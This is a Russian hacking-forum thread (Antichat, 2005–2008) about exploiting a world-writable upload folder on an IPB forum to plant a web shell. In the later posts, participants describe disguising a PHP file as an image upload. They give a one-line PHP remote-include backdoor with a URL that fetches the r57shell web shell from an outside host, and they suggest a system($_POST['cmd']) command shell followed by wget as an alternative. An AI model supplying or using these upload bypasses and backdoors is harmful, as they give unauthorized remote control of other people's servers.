ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Что можно сделать, если нашел папку 0777
  #1  
Старый 22.11.2005, 22:38
Аватар для avrely
avrely
Новичок
Регистрация: 02.11.2005
Сообщений: 17
Провел на форуме:
69755

Репутация: 0
По умолчанию Что можно сделать, если нашел папку 0777

Есть на форуме папка с Chmod 0777
Можно как-нить в неё загрузить файл?
 
Ответить с цитированием

  #2  
Старый 22.11.2005, 22:45
Аватар для africanec
africanec
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567

Репутация: -12
Отправить сообщение для africanec с помощью ICQ
По умолчанию

какие у тебя права и т.д?
 
Ответить с цитированием

  #3  
Старый 22.11.2005, 22:50
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Если папка открыта на запись, то это ещё не значит, что ты прям вот так просто сможешь заливать туда что-то)))) Это можно сделать ТОЛЬКО со стороны сервера, например, через какие-нить бажные скрипты шелл залить в эту папку. Это, если я правильно понимаю -))
Тоесть просто так всё равно ничё это не даёт.
 
Ответить с цитированием

  #4  
Старый 13.02.2008, 01:37
Аватар для Витян
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458

Репутация: 243
По умолчанию

форум ipb 2.1.х папка /uploads/, cmod 777, через загрузку фоты из профиля можно залить типа file.php.jpg в папке переименуецца на photo-1.txt размер загружаемого файла не больше 50 кб, залить шелл реально? или я туплю и мне пойти курить форум дальше? ...
 
Ответить с цитированием

  #5  
Старый 13.02.2008, 01:42
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Хм..... если они все переименовываются в txt, то значит txt опеределяется апачем как пхп т.к. фотки ведь отображаются...
Шелл должен работать
 
Ответить с цитированием

  #6  
Старый 13.02.2008, 01:54
Аватар для Витян
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458

Репутация: 243
По умолчанию

переименовываются file.php.jpg , а скрипт переименованный в file.jpg пишет Неудачная загрузка. Обратитесь к администрации форума для помощи.
шелл весит 100 кб )...нужно что-то поменьше

Последний раз редактировалось Витян; 13.02.2008 в 01:57..
 
Ответить с цитированием

  #7  
Старый 13.02.2008, 01:57
Аватар для Xeeper
Xeeper
Новичок
Регистрация: 06.03.2005
Сообщений: 19
Провел на форуме:
81759

Репутация: 5
По умолчанию

Есть шеллы поменьше
 
Ответить с цитированием

  #8  
Старый 13.02.2008, 02:03
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Сложно подумать =\

Создай файл file.php.jpg
С содержимым:
PHP код:
<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>
И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php
 
Ответить с цитированием

  #9  
Старый 13.02.2008, 02:17
Аватар для Piflit
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Isis  
Сложно подумать =\

Создай файл file.php.jpg
С содержимым:
PHP код:
<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>
И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php
на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget
 
Ответить с цитированием

  #10  
Старый 13.02.2008, 02:24
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Цитата:
Сообщение от Piflit  
на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget
На некоторых хостах запрещен system
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социальная инженерия. Профессиональное программирование. Последовательный взлом dinar_007 Болталка 15 23.12.2008 12:30
химия своими руками silveran Болталка 43 11.01.2006 22:05
Ru.phreak Faq silveran Электроника и Фрикинг 0 21.07.2005 10:20
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41
Что можно сделать с ip адресом iRedX ICQ 1 01.04.2003 21:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ